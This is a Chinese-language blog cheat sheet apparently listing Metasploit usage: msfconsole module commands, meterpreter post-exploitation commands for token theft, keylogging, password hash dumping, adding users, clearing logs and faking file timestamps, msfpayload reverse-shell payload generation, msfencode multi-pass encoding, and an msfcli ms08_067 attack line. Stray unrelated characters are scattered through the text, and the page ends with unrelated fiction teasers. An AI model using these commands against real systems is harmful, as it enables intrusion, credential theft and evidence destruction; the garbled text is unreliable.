MSF使用

Msfconsole:是一個一體化集中控制臺蕾殴,允許你訪問到幾乎所有的MSF框架選項



metasploit就是一個免費的漏洞框架,利用他人人都是黑客,使用者不需要任何編程基礎(chǔ)就可以使用


check:檢測漏洞是否存在
msf常用命令:

show exploits

列出metasploit框架中的所有滲透攻擊模塊。

show payloads

列出metasploit框架中的所有攻擊載荷被因。

show auxiliary

列出metasploit框架中的所有輔助攻擊載荷。

search name

查找metasploit框架中所有的滲透攻擊和其他模塊。

info

展示出制定滲透攻擊或模塊的相關(guān)信息梨与。

use name

裝載一個滲透攻擊或模塊堕花。

LHOST

你本地可以讓目標(biāo)主機(jī)連接的IP地址,通常當(dāng)目標(biāo)主機(jī)不在同一個局域網(wǎng)內(nèi)時蛋欣,就需要是一個公共IP地址航徙,特別為反彈式shell使用如贷。

RHOST

遠(yuǎn)程主機(jī)或是目標(biāo)主機(jī)陷虎。

set function

設(shè)置特定的配置參數(shù)(EG:設(shè)置本地或遠(yuǎn)程主機(jī)參數(shù))。

setg function

以全局方式設(shè)置特定的配置參數(shù)(EG:設(shè)置本地或遠(yuǎn)程主機(jī)參數(shù))杠袱。

show options

列出某個滲透攻擊或模塊中所有的配置參數(shù)尚猿。

show targets

列出滲透攻擊所有支持的目標(biāo)平臺。

set target num

指定你所知道的目標(biāo)的操作系統(tǒng)以及補丁版本類型楣富。

set payload name

指定想要使用的攻擊載荷凿掂。

show advanced

列出所有高級配置選項。

set autorunscript migrate -f.

在滲透攻擊完成后纹蝴,將自動遷移到另一個進(jìn)程庄萎。

check

檢測目標(biāo)是否選定滲透攻擊存在相應(yīng)的安全漏洞。

exploit

執(zhí)行滲透攻擊或模塊來攻擊目標(biāo)塘安。

exploit -j

在計劃任務(wù)下進(jìn)行滲透攻擊(攻擊將在后臺進(jìn)行)糠涛。

exploit -z

滲透攻擊完成后不與回話進(jìn)行交互。

exploit -e encoder

制定使用的攻擊載荷編碼方式(EG:exploit -e shikata_ga_nai)兼犯。

exploit -h

列出exploit命令的幫助信息忍捡。

sessions -l

列出可用的交互會話(在處理多個shell時使用)。

sessions -l -v

列出所有可用的交互會話以及詳細(xì)信息切黔,EG:攻擊系統(tǒng)時使用了哪個安全漏洞砸脊。

sessions -s script

在所有活躍的metasploit會話中運行一個特定的metasploit腳本。

sessions -K

殺死所有活躍的交互會話纬霞。

sessions -c cmd

在所有活躍的metasploit會話上執(zhí)行一個命令凌埂。

sessions -u sessionID

升級一個普通的win32 shell到metasploit shell。

db_create name

創(chuàng)建一個數(shù)據(jù)庫驅(qū)動攻擊所要使用的數(shù)據(jù)庫(EG:db_create autopwn)诗芜。

db_connect name

創(chuàng)建并連接一個數(shù)據(jù)庫驅(qū)動攻擊所要使用的數(shù)據(jù)庫(EG:db_connect user:passwd@ip/sqlname)瞳抓。

db_namp

利用nmap并把掃描數(shù)據(jù)存儲到數(shù)據(jù)庫中(支持普通的nmap語句,EG:-sT -v -P0)绢陌。

db_autopwn -h

展示出db_autopwn命令的幫助信息挨下。

db_autopwn -p -r -e

對所有發(fā)現(xiàn)的開放端口執(zhí)行db_autopwn,攻擊所有系統(tǒng)脐湾,并使用一個反彈式shell臭笆。

db_destroy

刪除當(dāng)前數(shù)據(jù)庫。

db_destroy user:passwd@host:port/database

使用高級選項來刪除數(shù)據(jù)庫。

***metasploit命令***

help

打開meterpreter使用幫助愁铺。

run scriptname

運行meterpreter腳本鹰霍,在scripts/meterpreter目錄下可查看到所有腳本名。

sysinfo

列出受控主機(jī)的系統(tǒng)信息茵乱。

ls

列出目標(biāo)主機(jī)的文件和文件夾信息茂洒。

use priv

加載特權(quán)提升擴(kuò)展模塊,來擴(kuò)展metasploit庫瓶竭。

ps

顯示所有運行的進(jìn)程以及相關(guān)聯(lián)的用戶賬戶督勺。

migrate PID

遷移到一個指定的進(jìn)程ID(PID號可通過ps命令從主機(jī)上獲得)。

use incognito

加載incognito功能(用來盜竊目標(biāo)主機(jī)的令牌或假冒用戶)

list_tokens -u

列出目標(biāo)主機(jī)用戶的可用令牌斤贰。

list_tokens -g

列出目標(biāo)主機(jī)用戶組的可用令牌智哀。

impersonate_token DOMAIN_NAME\\USERNAME

假冒目標(biāo)主機(jī)上的可用令牌。

steal_token PID

盜竊給定進(jìn)程的可用令牌并進(jìn)行令牌假冒荧恍。

drop_token

停止假冒當(dāng)前令牌瓷叫。

getsystem

通過各種攻擊向量來提升系統(tǒng)用戶權(quán)限。

execute -f cmd.exe -i

執(zhí)行cmd.exe命令并進(jìn)行交互送巡。

execute -f cmd.exe -i -t

以所有可用令牌來執(zhí)行cmd命令并隱藏該進(jìn)程摹菠。

rev2self

回到控制目標(biāo)主機(jī)的初始用戶賬戶下。

reg command

在目標(biāo)主機(jī)注冊表中進(jìn)行交互骗爆,創(chuàng)建次氨,刪除,查詢等操作淮腾。

setdesktop number

切換到另一個用戶界面(該功能基于那些用戶已登錄)糟需。

screenshot

對目標(biāo)主機(jī)的屏幕進(jìn)行截圖。

upload file

向目標(biāo)主機(jī)上傳文件谷朝。

download file

從目標(biāo)主機(jī)下載文件洲押。

keyscan_start

針對遠(yuǎn)程目標(biāo)主機(jī)開啟鍵盤記錄功能。

keyscan_dump

存儲目標(biāo)主機(jī)上捕獲的鍵盤記錄圆凰。

keyscan_stop

停止針對目標(biāo)主機(jī)的鍵盤記錄杈帐。

getprivs

盡可能多的獲取目標(biāo)主機(jī)上的特權(quán)。

uictl enable keyboard/mouse

接管目標(biāo)主機(jī)的鍵盤和鼠標(biāo)专钉。

background

將你當(dāng)前的metasploit shell轉(zhuǎn)為后臺執(zhí)行挑童。

hashdump

導(dǎo)出目標(biāo)主機(jī)中的口令哈希值。

use sniffer

加載嗅探模式跃须。

sniffer_interfaces

列出目標(biāo)主機(jī)所有開放的網(wǎng)絡(luò)端口站叼。

sniffer_dump interfaceID pcapname

在目標(biāo)主機(jī)上啟動嗅探。

sniffer_start interfaceID packet-buffer

在目標(biāo)主機(jī)上針對特定范圍的數(shù)據(jù)包緩沖區(qū)啟動嗅探菇民。

sniffer_stats interfaceID

獲取正在實施嗅探網(wǎng)絡(luò)接口的統(tǒng)計數(shù)據(jù)尽楔。

sniffer_stop interfaceID

停止嗅探投储。

add_user username password -h ip

在遠(yuǎn)程目標(biāo)主機(jī)上添加一個用戶。

clearev

清楚目標(biāo)主機(jī)上的日志記錄阔馋。

timestomp

修改文件屬性玛荞,例如修改文件的創(chuàng)建時間(反取證調(diào)查)。

reboot

重啟目標(biāo)主機(jī)呕寝。

***MSFpayload命令***

msfpayload -h

msfpayload的幫助信息勋眯。

msfpayload windows/meterpreter/bind_tcp O

列出所有windows/meterpreter/bind_tcp下可用的攻擊載荷的配置項(任何攻擊載荷都是可用配置的)。

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe

創(chuàng)建一個metasploit的reverse_tcp攻擊載荷下梢,回連到LHOSTip的LPORT客蹋,將其保存為名為payload.exe的windows下可執(zhí)行程序。

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw

創(chuàng)建一個metasploit的reverse_tcp攻擊載荷怔球,回連到LHOSTip的LPORT嚼酝,將其保存為名為payload.raw,該文件后面的msffencode中使用竟坛。

msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c

創(chuàng)建一個metasploit的reverse_tcp攻擊載荷,導(dǎo)出C格式的shellcode钧舌。

msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java

創(chuàng)建一個metasploit的reverse_tcp攻擊載荷担汤,導(dǎo)出成以%u編碼方式的javaScript語言字符串。

***msfencode命令***

mefencode -h

列出msfencode的幫助命令洼冻。

msfencode -l

列出所有可用的編碼器崭歧。

msfencode -t (c,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)

顯示編碼緩沖區(qū)的格式。

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

使用shikata_ga_nai編碼器對payload.raw文件進(jìn)行5編碼撞牢,然后導(dǎo)出一個名為encoded_payload.exe的文件率碾。

msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

創(chuàng)建一個經(jīng)過多種編碼格式嵌套編碼的攻擊載荷。

msfencode -i payload.raw BufferRegister=ESI -e x86/alpja_mixed -t c

創(chuàng)建一個純字母數(shù)字的shellcode屋彪,由ESI寄存器只想shellcode所宰,以C語言格式輸出。

***MSFcli命令***

msfcli | grep exploit

僅列出滲透攻擊模塊畜挥。

msfcli | grep exploit/windows

僅列出與windows相關(guān)的滲透攻擊模塊仔粥。

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E

對IP發(fā)起ms08_067_netapi滲透攻擊,配置了bind_tcp攻擊載荷蟹但,并綁定在PORT端口進(jìn)行監(jiān)聽

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末躯泰,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子华糖,更是在濱河造成了極大的恐慌麦向,老刑警劉巖,帶你破解...
    沈念sama閱讀 222,183評論 6 516
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件客叉,死亡現(xiàn)場離奇詭異诵竭,居然都是意外死亡景描,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,850評論 3 399
  • 文/潘曉璐 我一進(jìn)店門秀撇,熙熙樓的掌柜王于貴愁眉苦臉地迎上來超棺,“玉大人,你說我怎么就攤上這事呵燕√幕妫” “怎么了?”我有些...
    開封第一講書人閱讀 168,766評論 0 361
  • 文/不壞的土叔 我叫張陵再扭,是天一觀的道長氧苍。 經(jīng)常有香客問我,道長泛范,這世上最難降的妖魔是什么让虐? 我笑而不...
    開封第一講書人閱讀 59,854評論 1 299
  • 正文 為了忘掉前任,我火速辦了婚禮罢荡,結(jié)果婚禮上赡突,老公的妹妹穿的比我還像新娘。我一直安慰自己区赵,他們只是感情好惭缰,可當(dāng)我...
    茶點故事閱讀 68,871評論 6 398
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著笼才,像睡著了一般漱受。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上骡送,一...
    開封第一講書人閱讀 52,457評論 1 311
  • 那天昂羡,我揣著相機(jī)與錄音,去河邊找鬼摔踱。 笑死虐先,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的昌渤。 我是一名探鬼主播赴穗,決...
    沈念sama閱讀 40,999評論 3 422
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼膀息!你這毒婦竟也來了般眉?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,914評論 0 277
  • 序言:老撾萬榮一對情侶失蹤潜支,失蹤者是張志新(化名)和其女友劉穎甸赃,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體冗酿,經(jīng)...
    沈念sama閱讀 46,465評論 1 319
  • 正文 獨居荒郊野嶺守林人離奇死亡埠对,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,543評論 3 342
  • 正文 我和宋清朗相戀三年络断,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片项玛。...
    茶點故事閱讀 40,675評論 1 353
  • 序言:一個原本活蹦亂跳的男人離奇死亡貌笨,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出襟沮,到底是詐尸還是另有隱情锥惋,我是刑警寧澤,帶...
    沈念sama閱讀 36,354評論 5 351
  • 正文 年R本政府宣布开伏,位于F島的核電站膀跌,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏固灵。R本人自食惡果不足惜捅伤,卻給世界環(huán)境...
    茶點故事閱讀 42,029評論 3 335
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望巫玻。 院中可真熱鬧丛忆,春花似錦、人聲如沸大审。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,514評論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽徒扶。三九已至,卻和暖如春根穷,著一層夾襖步出監(jiān)牢的瞬間姜骡,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,616評論 1 274
  • 我被黑心中介騙來泰國打工屿良, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留圈澈,地道東北人。 一個月前我還...
    沈念sama閱讀 49,091評論 3 378
  • 正文 我出身青樓尘惧,卻偏偏與公主長得像康栈,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子喷橙,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,685評論 2 360

推薦閱讀更多精彩內(nèi)容